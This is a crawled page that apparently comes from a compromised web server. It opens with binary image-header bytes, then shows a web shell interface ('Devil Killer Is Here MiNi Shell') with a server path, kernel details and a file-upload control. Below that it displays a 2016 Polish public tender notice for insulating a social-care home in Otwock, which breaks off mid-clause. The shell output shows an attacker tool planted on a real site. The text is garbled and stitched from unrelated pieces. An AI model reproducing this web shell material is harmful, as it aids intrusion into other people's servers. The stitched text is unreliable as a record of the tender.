JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160616/90525-N-2016.html

<p class="kh_header"><b>Otwock: Termomodernizacja budynku Domu Pomocy Społecznej w Otwocku przy ul. Konopnickiej 17- docieplenie   ścian i stropu dachu wraz z częściową wymianą stolarki drzwiowej</b><br>
<b>Numer ogłoszenia: 90525 - 2016; data zamieszczenia: 16.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Marii Konopnickiej 17, 05-400 Otwock, woj. mazowieckie, tel. 22 7793403, faks 22 7793403.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.powiat-otwocki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Domu Pomocy Społecznej w Otwocku przy ul. Konopnickiej 17- docieplenie   ścian i stropu dachu wraz z częściową wymianą stolarki drzwiowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Termomodernizacja budynku Domu Pomocy Społecznej w Otwocku przy ul. Konopnickiej 17 - docieplenie   ścian i stropu dachu wraz z częściową wymianą stolarki drzwiowej. 
2. Szczegółowy opis przedmiotu zamówienia określa Dokumentacja projektowa - Termomodernizacja budynku Domu Pomocy Społecznej, specyfikacja techniczna wykonania i odbioru robót, przedmiar  robót.
Przedmiar określający zakres prac ma  charakter pomocniczy w celu zapoznania się z przedmiotem zamówienia  i w trakcie realizacji zamówienia nie może stanowić podstawy roszczenia wykonawcy, z tytułu informacji w nim zawartych.  
3. Przedmiot umowy musi być wykonany zgodnie z obowiązującymi przepisami, normami, warunkami technicznymi i sztuka budowlana, przepisami bhp, ppoż.
4. Planowany zakres robót budowlanych dotyczy w szczególności:
1) demontażu istniejących rur spustowych oraz ponowny ich montaż po wykonaniu warstw izolacji ścian,  
2) demontaż podokienników,
3) zamurowanie otworów okiennych po zdemontowanej stolarce okiennej,
4) wymianę balustrad tarasów, balkonów oraz schodów zewnętrznych, 
5) ocieplenie ścian  zewnętrznych płytami styropianowymi o grubości  15 cm i 10 cm (cokół) wraz z    
wykonaniem tynku cienkowarstowego,( demontaż istniejącego  ocieplenia z płyt suprema, wszystkie odspojone, uszkodzone, zawilgocone warstwy tynku skuć, uzupełnienie ubytków w tynku, docieplenie ścian zewnętrznych  wykonane  metodą (lekko-mokrą)
6) ocieplenie pokrycia dachowego od wewnątrz na poddaszu płytami z wełny mineralnej  grubości
   15 cm na ruszcie drewnianym, (do istniejącej  konstrukcji dachowej zamocować wiatroizolację z folii dachowej, następnie izolację  z wełny mineralnej gr 150 mm oraz paroizolacje w postaci folii polietylenowej).
7) naprawę kompleksową tarasów i schodów zewnętrznych,
( skucie  istniejącej  posadzki z terakoty, i sfrezowanie  istniejącej powierzchni betonowej, demontaż  istniejących balustrad, wykonanie nowych obróbek blacharskich z blachy stalowej powlekanej, wykonanie nowej wylewki z masy samopoziomującej, wykonanie  nowej  wylewki  z  masy samopoziomującej, wykonanie izolacji przeciwwodnej, przygotowanie podłoża  gruntującego pod wykonanie okładzin ceramicznych, wykonanie nowej nawierzchni tarasów  i schodów z płytek gresowych, montaż nowych balustrad z profili stalowych, pomalowanie balustrad farbą antykorozyjną 
8) montaż nowych obróbek blacharskich tarasów oraz podokienników,( w tym skucie  istniejącej  okładziny  ceramiczne tarasów oraz schodów zewnętrznych  wraz z jastrychem cementowym)
9) naprawa opaski betonowej wokół budynku, (w tym skucie istniejącej opaski betonowej wokół budynku)
10) wymianę ślusarki okiennej i drzwiowej,
11) malowanie farbą antykorozyjną stalowych elementów budynku,
12) malowanie  farbami emulsyjnymi starych tynków  wewnętrznych ścian
13) wykonanie nowego daszka nad balkonem od strony wschodniej.
14)Wywiezienie materiałów rozbiórkowych
15) porządkowanie terenu
16)Demontaż instalacji odgromowej do ponownego montażu
17)Montaż zdemontowanych zwodów instalacji odgromowej
18) Wszelkie drobne elementy  wyposażenia budynku uchwyty do flag, tablice informacyjne, numery administracyjne, oprawy oświetleniowe należy zdemontować , oczyścić , pomalować elementy stalowe farbą antykorozyjną i ponownie zamontować po wykonaniu robót remontowych.
Szczegółowy opis przedmiotu zamówienia określa Dokumentacja projektowa - Termomodernizacja budynku Domu Pomocy Społecznej w Otwocku,  specyfikacja techniczna wykonania i odbioru robót, przedmiar  robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przewiduje się możliwość udzielenia zamówienia uzupełniającego na podstawie odrębnej umowy lub umów zawartych z Wykonawcą w trybie zamówienia z wolnej ręki, na podstawie art. 67 ust. 1 pkt. 6 Ustawy. Zamówienie uzupełniające może zostać udzielone w terminie 3 lat od dnia udzielenia zamówienia podstawowego i dotyczyć będzie zakresu:

- ocieplenie  ścian zewnętrznych;
- wymiana obróbek blacharskich ,rynien, rur spustowych;
- rozebranie i montaż balustrad balkonów;
- rozebranie i ponowne ułożenie opaski;
- wykonanie tynku, (roboty elewacyjne);
- naprawa izolacji i ścian fundamentowych;
- ocieplenie pokrycia dachowego;
- naprawa tarasów  i schodów zewnętrznych
- malowanie tynków;
- robót rozbiórkowych i ziemnych;
Wartość zamówienia uzupełniającego nie będzie przekraczać 50% wartości zamówienia podstawowego.
Roboty te zostaną wykonane z materiałów takich, jak zostały użyte  w zamówieniu podstawowym oraz zostaną wykonane metoda taką jak użyto przy realizacji zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.52.13-3, 45.26.00.00-7, 45.42.11.00-5, 45.45.00.00-6, 45.43.11.00-8, 45.44.22.00-9, 45.31.00.00-3, 45.31.23.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium w wysokości 8 000 PLN
2.Każda oferta musi być zabezpieczona wadium na cały okres związania ofertą, w wysokości: 8000 zł. (słownie: osiem tysięcy złotych). 
3.Z postępowania o udzielenie zamówienia zostanie wykluczony wykonawca, który nie wniesie wadium. 
4.Wadium może być wnoszone  w jednej lub kliku następujących formach:
4.1.pieniądzu
4.2.poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo- kredytowej, z tym  że poręczenie kasy jest zawsze poręczeniem pieniężnym,
4.3.gwarancjach bankowych,
4.4.gwarancjach ubezpieczeniowych;
4.5.w poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy   z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2014 r. poz.1804 ze zm).
5.Wadium wnoszone w pieniądzu wnosi się wyłącznie przelewem na rachunek bankowy wskazany przez zamawiającego. Nie jest dopuszczalna bezpośrednia wpłata kwoty wadium np. w kasie zamawiającego lub banku.
6.Wadium wnoszone w pieniądzu wpłaca się przelewem  na konto Zamawiającego Powiat Otwocki ul. Górna13 05 - 400 Otwock  Bank Spółdzielczy w KARCZEWIE 78 8023 0009 2001 0009 8573 0019   z dopiskiem termomodernizacja  budynku Domu Pomocy Społecznej w Otwocku ul. Konopnickiej 17-ZP2.2016
7. Dowód wniesienia wadium w pieniądzu musi  być oznaczony w rubryce tytułem zapisem    
Termomodernizacja budynku Domu Pomocy Społecznej w Otwocku przy ul. Konopnickiej 17 - docieplenie   ścian i stropu dachu wraz z częściową wymianą stolarki drzwiowej
8. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
9. Wadium wniesione przelewem na konto uznane będzie za wniesione w terminie, jeżeli przed terminem składania ofert konto zamawiającego będzie uznane kwotą wadium. 
10.O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacone zostało w wymaganym   
terminie decyduje data wpływu środków na rachunek Zamawiającego.
Dokument  potwierdzający wniesienie wadium w innych formach niż w pieniądzu  należy dołączyć do oferty. Oryginał dokumentu gwarancji/poręczenia należy złożyć z ofertą.
11 Wykonawca, który nie zabezpieczy oferty zaakceptowaną formą wadium, zostanie przez         
 Zamawiającego wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt 2 pzp.
12. Złożone poręczenie  lub gwarancja  muszą zawierać w swojej treści zobowiązanie zgodnie z art. 46 ust 5 Ustawy.
13.Dokument poręczenia/gwarancyjny powinien przewidywać bezwarunkową utratę wadium na rzecz Zamawiającego w przypadkach określonych w pkt.15 i 16 Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
14.Wadium musi być ważne minimum  przez okres 30 dni (na cały okres związania ofertą) licząc od terminu składania ofert( również dzień składania ofert)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia.  
Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w okresie ostatnich  5 lat przed upływem  terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał  zgodnie zasadami sztuki budowlanej i prawidłowo ukończył oraz  należycie wykonał, co najmniej dwie   roboty  budowlany dotyczące termomodernizacji ( docieplenie) o wartości nie mniejszej niż 200.000 zł brutto każda z nich i każda z nich będzie polegała  między  innymi  na dociepleniu ścian zewnętrznych oraz  montażu  lub wymianie stolarki okiennej lub drzwiowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia (osoby, które będą uczestniczyć  w wykonaniu zamówienia) kierownikiem budowy -1 osoba, posiadającym uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia tego warunku .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone wzór wykazu wykonanych robót stanowi Załącznik nr 7 do SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy. 
1.  Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku do treści oferty na podstawie której dokona wyboru Wykonawcy. 
Zamawiający, przewiduje również możliwość dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1) zmiany zakresu lub sposobu wykonania zamówienia  spowodowane zmiana dokumentacji projektowej lub technicznej przez projektanta  i zaakceptowanej przez Zamawiającego , które mogą spowodować rozszerzenie przedmiotu zamówienia.
2)konieczności zmiany, w tym w zakresie wysokości wynagrodzenia, związanej ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT) lub,
3)siły wyższej uniemożliwiającej  wykonanie przedmiotu umowy zgodnie z  ofertą i SIWZ, 

 2. Zamawiający przewiduje możliwość zmiany terminu realizacji w przypadku:
1)	zaistnienia nieprzewidzianych utrudnień, związanych z konstrukcją budynku oraz w przypadku nieprzewidzianych, dodatkowych robót budowlanych,
2)	w przypadku sporządzenia protokołu konieczności na wykonanie robót koniecznych lub dodatkowych, wykonanie których stało się niezbędne do prawidłowego wykonania przedmiotu umowy  zgodnie ze sztuką budowlaną,
3) konieczności wykonania robót zamiennych, niezbędnych dla prawidłowego i zgodnego z prawem budowlanym wykonania przedmiotu umowy,
4)  wstrzymania realizacji umowy przez Zamawiającego z przyczyn leżących po jego stronie,
   5)  warunków atmosferycznych uniemożliwiających realizację robót,
   6) wystąpienia okoliczności, których  strony umowy nie były w stanie przewidzieć, pomimo 
      zachowania należytej staranności
1)	w razie zaistnienia zdarzeń o charakterze działania siły wyższej, przez którą strony rozumieją klęski żywiołowe, stan wyjątkowy, działania terrorystyczne, strajk powszechny, nowe akty prawne lub decyzje właściwych władz, a także działania lub zaniechania działania organów państwowych, samorządowych lub osób trzecich uniemożliwiających terminową realizację zamówienia, o okres nie przekraczający czasu trwania przeszkody w wykonaniu zamówienia
  7)   nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego , których Zamawiający  
       nie mógł przewidzieć w chwili zawarcia umowy. 
  8)   zawieszenia przez zamawiającego wykonania części lub całości robót na czas trwania  
       obiektywnej przeszkody, 
  9) błędów w dokumentacji projektowej lub innych dokumentach budowy, których usunięcie będzie  
      poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian  
      w projekcie, innych dokumentach, 
10) konieczność uzyskania dodatkowych opinii lub uzgodnień, 
11) zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem 
       umowy i nieprzewidywalnych, których brak wykonania uniemożliwia lub utrudnia prawidłowe 
      wykonanie przedmiotu umowy, 
12)   w razie udzielenia zamówienia dodatkowego zgodnie z art. 67 ust. l pkt. 5 ustawy Prawo zamówień publicznych, o okres wykonania zamówienia dodatkowego.
13) Termin zakończenia przedmiotu zamówienia może  zostać zmieniony  z uwzględnieniem  trwania przyczyny.
3. Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. Będą to, w szczególności, okoliczności:
1)	powodujące poprawienie parametrów technicznych,
2)	wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów,
3)	dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej, pod warunkiem że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.
4. Zmiany, o których mowa w niniejszym paragrafie muszą być każdorazowo zatwierdzone przez Zamawiającego,   na podstawie uzgodnień przeprowadzonych z projektantem.
5.  Zmiany,	o których mowa w ust.   3  niniejszego paragrafu nie mogą spowodować zmiany wynagrodzenia umownego, o którym mowa w § 4 ust. 1  umowy.
6. Zmiany przedstawicieli Zamawiającego i Wykonawcy oraz uczestników procesu inwestycyjnego w 
    umowie , w szczególności kierownika budowy, pod warunkiem, że posiada ona  kwalifikacje nie 
